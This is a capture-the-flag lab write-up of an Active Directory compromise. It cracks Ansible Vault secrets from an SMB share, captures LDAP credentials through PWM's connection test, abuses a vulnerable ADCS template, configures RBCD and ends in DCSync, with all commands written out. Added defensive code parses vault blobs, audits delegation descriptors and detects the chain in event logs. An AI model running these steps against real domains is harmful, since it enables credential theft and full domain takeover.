Authority
Overview
Authority exposes Ansible Vault hashes in an SMB Development share. Cracking them reveals a PWM (Password Manager Web) admin password. PWM's LDAP test feature leaks the svc_ldap credentials by pointing it at a controlled listener. BloodHound confirms svc_ldap can add machine accounts. A vulnerable ADCS template (CorpVPN) allows requesting a certificate for Administrator from a new machine account. PassTheCert then configures RBCD from the machine account to the DC, and a final S4U2Proxy flow yields a CIFS ticket for DCSync.
Recon
Nmap
```bash
sudo nmap -sC -sV -vv -oA tcp 10.129.229.56 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.229.56
```
Port 80 is the default IIS page. Port 8443 hosts the PWM web interface but requires a password:
SMB - Development Share
Enumerate as guest:
The Development share contains interesting data:
PWM version 2.0.3 is identified.
Download everything from the Development share using NXC spider:
```bash
nxc smb 10.129.229.56 -u guest -p '' -M spider_plus -o DOWNLOAD_FLAG=true
```
Ansible Vault Hash Cracking
The share contains Ansible Vault-encrypted strings. Each vault hash must be in its own file in this format for john to process:
```
$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764
```
Convert to crackable format with ansible2john:
```
ansi_vault_hash:$ansible$0*0*2fe48d56e7...
```
Crack with john or hashcat.
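The vault format above is simple enough to parse by hand, which is useful on the blue side: a scan of a file share or a repository can locate every embedded vault blob and report where secrets are stored, rather than relying on a grep for the header line. The following is an added example (not code from the original writeup or from Ansible) that lays out a vault 1.1/1.2 envelope the way ansible-vault does (three hex fields joined by newlines, hex-encoded again, wrapped at 80 columns), parses it back into its salt, HMAC tag and ciphertext, and finds blobs embedded in a larger YAML document. The salt, tag and ciphertext values are constructed, not taken from the share.

```python
import binascii
import re

# Constructed sample values (not the blob from the share): 32-byte salt,
# 32-byte HMAC-SHA256 tag and a 32-byte AES-CTR ciphertext.
SAMPLE_SALT = bytes(range(32))
SAMPLE_HMAC = bytes([0xAA] * 32)
SAMPLE_CIPHERTEXT = bytes([0x11, 0x22, 0x33, 0x44] * 8)

# A vault blob: header line, then one or more lines of hex, possibly indented
# (inline "!vault |" values in YAML are indented).
VAULT_RE = re.compile(r"\$ANSIBLE_VAULT;[^\n]+\n(?:[ \t]*[0-9a-fA-F]+[ \t]*(?:\n|$))+")


def build_vault_envelope(salt, hmac_tag, ciphertext, vault_id=None):
    """Lay out a blob the way ansible-vault writes it: hex(salt)\\nhex(hmac)\\nhex(ct),
    hex-encoded once more and wrapped at 80 columns under the header."""
    inner = b"\n".join(binascii.hexlify(x) for x in (salt, hmac_tag, ciphertext))
    outer = binascii.hexlify(inner).decode()
    header = "$ANSIBLE_VAULT;1.2;AES256;" + vault_id if vault_id else "$ANSIBLE_VAULT;1.1;AES256"
    lines = [outer[i:i + 80] for i in range(0, len(outer), 80)]
    return header + "\n" + "\n".join(lines) + "\n"


def parse_vault_envelope(text):
    """Split a vault blob back into header fields, salt, HMAC tag and ciphertext."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    fields = lines[0].split(";")
    if len(fields) < 3 or fields[0] != "$ANSIBLE_VAULT" or fields[2] != "AES256":
        raise ValueError("not an AES256 Ansible Vault blob")
    inner = binascii.unhexlify("".join(lines[1:]))
    parts = inner.split(b"\n")
    if len(parts) != 3:
        raise ValueError("payload does not contain salt, hmac and ciphertext")
    salt, hmac_tag, ciphertext = (binascii.unhexlify(p) for p in parts)
    # PBKDF2 salt and HMAC-SHA256 tag are 32 bytes; AES-CTR output is PKCS7-padded to 16.
    if len(salt) != 32 or len(hmac_tag) != 32 or len(ciphertext) % 16:
        raise ValueError("malformed vault payload")
    return {
        "version": fields[1],
        "vault_id": fields[3] if len(fields) > 3 else None,
        "salt": salt,
        "hmac": hmac_tag,
        "ciphertext": ciphertext,
    }


def find_vault_blobs(document):
    """Locate every vault blob embedded in a larger file so a share or repository
    scan can report where encrypted secrets are kept."""
    return [parse_vault_envelope(m.group(0)) for m in VAULT_RE.finditer(document)]


def sample_yaml():
    """Constructed playbook variables file with one inline vault value."""
    blob = build_vault_envelope(SAMPLE_SALT, SAMPLE_HMAC, SAMPLE_CIPHERTEXT)
    indented = "".join("          " + ln + "\n" for ln in blob.splitlines())
    return "pwm_admin_password: !vault |\n" + indented + "other_key: plain\n"


if __name__ == "__main__":
    for blob in find_vault_blobs(sample_yaml()):
        print("vault", blob["version"], "id", blob["vault_id"],
              "salt", blob["salt"].hex()[:16], "ciphertext bytes", len(blob["ciphertext"]))
```

The parser deliberately stops at the envelope: it tells you that a vault-protected secret is present and where, which is the inventory a defender needs, and it does not attempt key derivation. The lesson from this share is that vault blobs protect only as well as the passphrase, so a weak passphrase on a world-readable share is equivalent to cleartext.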
Decrypt Ansible Vault Data
With the cracked password, decrypt the vault contents:
```bash
cat 1 | ansible-vault decrypt
```
PWM admin password: pWm_@dm!N_!23
Foothold
PWM LDAP Credential Capture
Log into PWM at port 8443 with the recovered password:
PWM stores an LDAP bind password and provides a "Test LDAP Connection" feature in its editor. The password is already pre-filled (masked). By changing the LDAP server to our own machine and starting a netcat listener, when we test the connection PWM sends the stored cleartext LDAP password to us:
Captured credentials: svc_ldap:lDaP_1n_th3_cle4r!
BloodHound Collection
```bash
bloodhound-ce-python -c all -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -d authority.htb \
  -dc authority.htb --dns-tcp -ns 10.129.229.56
```
svc_ldap is a member of the Remote Management group:
WinRM access as svc_ldap.
Privilege Escalation
ADCS - Vulnerable Template (CorpVPN)
Enumerate ADCS templates for misconfigurations:
```bash
certipy-ad find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.129.229.56 -vulnerable
```
Machine Account Quota
Confirm svc_ldap can create machine accounts (MachineAccountQuota > 0):
```bash
nxc ldap 10.129.229.56 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -M maq
```
Add a new machine account:
```bash
impacket-addcomputer -dc-ip 10.129.229.56 -computer-name syk0 \
  authority.vl/svc_ldap:'lDaP_1n_th3_cle4r!'
```
Request Certificate as Administrator
Use the new machine account to request a certificate from the CorpVPN template with the Administrator UPN:
```bash
certipy-ad req -username syk0$ -password 0DfbpaONGq6DnSPQ6G2wF9QsgoVu6YW2 \
  -ca AUTHORITY-CA -template CorpVPN -dc-ip 10.129.229.56 \
  -upn [email protected] -dns authority.htb -debug
```
PassTheCert - RBCD Configuration
The certificate can be used with PassTheCert to modify AD attributes via LDAPS. Configure RBCD so our machine account (SYK0$) can delegate to the DC (AUTHORITY$):
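What write_rbcd actually changes is the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the DC's computer object, which holds a binary security descriptor whose DACL lists the SIDs allowed to delegate to it. Auditing that attribute is the defender's counterpart to this step: decode the descriptor, list the SIDs, and compare against the delegations you expect. The following is an added example (not code from the original writeup, Impacket or PassTheCert) that builds a self-relative security descriptor in the layout AD stores, extracts the ACCESS_ALLOWED SIDs from its DACL, and reports any that are not on an approved list. The machine SID is a constructed value standing in for SYK0$.

```python
import struct

# Constructed SID standing in for the new SYK0$ machine account.
SAMPLE_MACHINE_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000


def build_sid(sid_string):
    """Binary SID: revision, sub-authority count, 6-byte big-endian authority, LE sub-authorities."""
    parts = sid_string.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    out = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    for sub in subs:
        out += struct.pack("<I", sub)
    return out


def parse_sid(buf, pos):
    """Return (S-1-... string, position after the SID)."""
    revision, count = buf[pos], buf[pos + 1]
    authority = int.from_bytes(buf[pos + 2:pos + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, pos + 8)
    text = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return text, pos + 8 + 4 * count


def build_rbcd_descriptor(allowed_sids, owner_sid="S-1-5-32-544"):
    """Self-relative SECURITY_DESCRIPTOR: 20-byte header, owner SID, then a DACL of
    ACCESS_ALLOWED ACEs, one per delegating principal. Constructed, for the demo."""
    aces = b""
    for sid in allowed_sids:
        sid_bytes = build_sid(sid)
        ace_size = 8 + len(sid_bytes)  # type, flags, size, mask + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, 0x000F01FF) + sid_bytes
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = build_sid(owner_sid)
    offset_owner = 20
    offset_dacl = 20 + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         offset_owner, 0, 0, offset_dacl)
    return header + owner + acl


def rbcd_allowed_sids(sd):
    """List the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    if not sd:
        return []  # attribute not set: no inbound resource-based delegation
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos = off_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = parse_sid(sd, pos + 8)
            sids.append(sid)
        pos += ace_size
    return sids


def audit_rbcd(sd, expected_sids):
    """Return SIDs that may act on behalf of this computer but are not approved."""
    expected = set(expected_sids)
    return [s for s in rbcd_allowed_sids(sd) if s not in expected]


if __name__ == "__main__":
    # Simulate what an audit would read back from AUTHORITY$ after the attacker's write.
    descriptor = build_rbcd_descriptor([SAMPLE_MACHINE_SID])
    print("unexpected delegation from:", audit_rbcd(descriptor, expected_sids=[]))
```

In practice the descriptor comes from an LDAP read of the DC's computer object; a domain controller should normally have this attribute empty, so any SID at all is worth a ticket, and a freshly created machine account appearing there is the signature of exactly this technique. Clearing the attribute and removing the rogue computer object is the remediation.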
```bash
python3 impacket-passthecert.py -action write_rbcd \
  -crt cert.crt -key cert.key \
  -domain authority.htb -dc-ip 10.129.229.56 -port 636 \
  -delegate-to 'AUTHORITY$' -delegate-from 'SYK0$'
```
S4U2Proxy → CIFS Ticket
Request a service ticket impersonating Administrator to the DC's CIFS service:
```bash
impacket-getST -spn 'cifs/AUTHORITY.authority.htb' -impersonate Administrator \
  'authority.htb/syk0$:RawapPCb2zTGcQvBV4I9WHnwqwNPtiHU'
```
Export the ticket:
```bash
export KRB5CCNAME=Administrator@[email protected]
```
DCSync
Use the impersonated ticket to perform DCSync:
```bash
impacket-secretsdump -just-dc-user Administrator -k -no-pass \
  authority.htb/[email protected]
```
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SMB Development share | Ansible Vault hashes |
| Credential access | john → ansible-vault decrypt | pWm_@dm!N_!23 |
| LDAP capture | PWM test connection → netcat | svc_ldap:lDaP_1n_th3_cle4r! |
| Foothold | Evil-WinRM | Shell as svc_ldap |
| Machine account | impacket-addcomputer | syk0$ created |
| ADCS | CorpVPN template + UPN spoofing | Certificate as administrator |
| RBCD | PassTheCert write_rbcd | syk0$ → AUTHORITY$ delegation |
| Privesc | getST S4U2Proxy + DCSync | Administrator hash |
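Three of the phases in the table above leave distinct traces in Windows audit logs: a machine account created by an ordinary user (event 4741, the Machine Account Quota step), a certificate issued with a SAN UPN that does not match the requesting account (CA event 4887, the CorpVPN step), and a directory read requesting the DS-Replication-Get-Changes rights from something that is not a domain controller (event 4662, the DCSync step). The following is an added example (not code from the original writeup) that runs those three detections over constructed event records shaped like parsed Security and CA audit logs. The allowlists, field names and sample events are constructed; in particular, which 4887 field exposes the requested SAN depends on how the CA logs request attributes, so treat `SubjectAlternativeName` as an assumed field name.

```python
import re

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Control-access rights a DCSync-style replication request needs.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
# Constructed allowlists: who is expected to join machines and to replicate.
APPROVED_JOINERS = {"AUTHORITY\\SCCM-JOIN"}
REPLICATION_ACCOUNTS = {"AUTHORITY$"}

# Constructed events shaped like parsed Security / CA audit records.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectDomainName": "AUTHORITY", "SubjectUserName": "svc_ldap",
     "TargetUserName": "SYK0$"},
    {"EventID": 4887, "Requester": "AUTHORITY\\SYK0$", "CertificateTemplate": "CorpVPN",
     "SubjectAlternativeName": "upn=administrator@authority.htb"},
    {"EventID": 4887, "Requester": "AUTHORITY\\jdoe", "CertificateTemplate": "User",
     "SubjectAlternativeName": "upn=jdoe@authority.htb"},
    {"EventID": 4662, "SubjectDomainName": "AUTHORITY", "SubjectUserName": "Administrator",
     "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "AUTHORITY", "SubjectUserName": "AUTHORITY$",
     "ObjectType": "domainDNS", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4741, "SubjectDomainName": "AUTHORITY", "SubjectUserName": "SCCM-JOIN",
     "TargetUserName": "WS0042$"},
]


def rule_machine_account(ev):
    """4741: computer account created by someone outside the provisioning allowlist."""
    if ev.get("EventID") != 4741:
        return None
    creator = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
    if creator not in APPROVED_JOINERS:
        return ("unapproved-machine-account", creator, ev["TargetUserName"])
    return None


def rule_san_mismatch(ev):
    """4887: issued certificate whose SAN UPN names a different account than the requester."""
    if ev.get("EventID") != 4887:
        return None
    requester = ev["Requester"].split("\\")[-1].rstrip("$").lower()
    m = re.search(r"upn=([^@\s,]+)@", ev.get("SubjectAlternativeName", ""), re.I)
    if m and m.group(1).lower() != requester:
        return ("san-upn-mismatch", ev["Requester"], m.group(1))
    return None


def rule_replication(ev):
    """4662: replication rights exercised on the domain head by a non-DC account."""
    if ev.get("EventID") != 4662 or ev.get("ObjectType") != "domainDNS":
        return None
    guids = set(GUID_RE.findall(ev.get("Properties", "").lower()))
    if guids & REPLICATION_GUIDS and ev["SubjectUserName"].upper() not in REPLICATION_ACCOUNTS:
        subject = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        return ("dcsync-like-replication", subject, ",".join(sorted(guids & REPLICATION_GUIDS)))
    return None


RULES = [rule_machine_account, rule_san_mismatch, rule_replication]


def run_rules(events):
    """Apply every rule to every event; return the (rule, subject, detail) hits in order."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for rule_name, subject, detail in run_rules(SAMPLE_EVENTS):
        print(f"{rule_name}: {subject} -> {detail}")
```

The three hits line up with the chain in the table: svc_ldap creating SYK0$, SYK0$ obtaining a certificate for administrator, and Administrator (via the S4U2Proxy ticket) pulling replication data from a host that is not a DC. Each rule also has a preventive counterpart: set ms-DS-MachineAccountQuota to 0, remove "supply in request" from the CorpVPN template or require manager approval, and restrict replication rights to domain controllers and known sync accounts.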

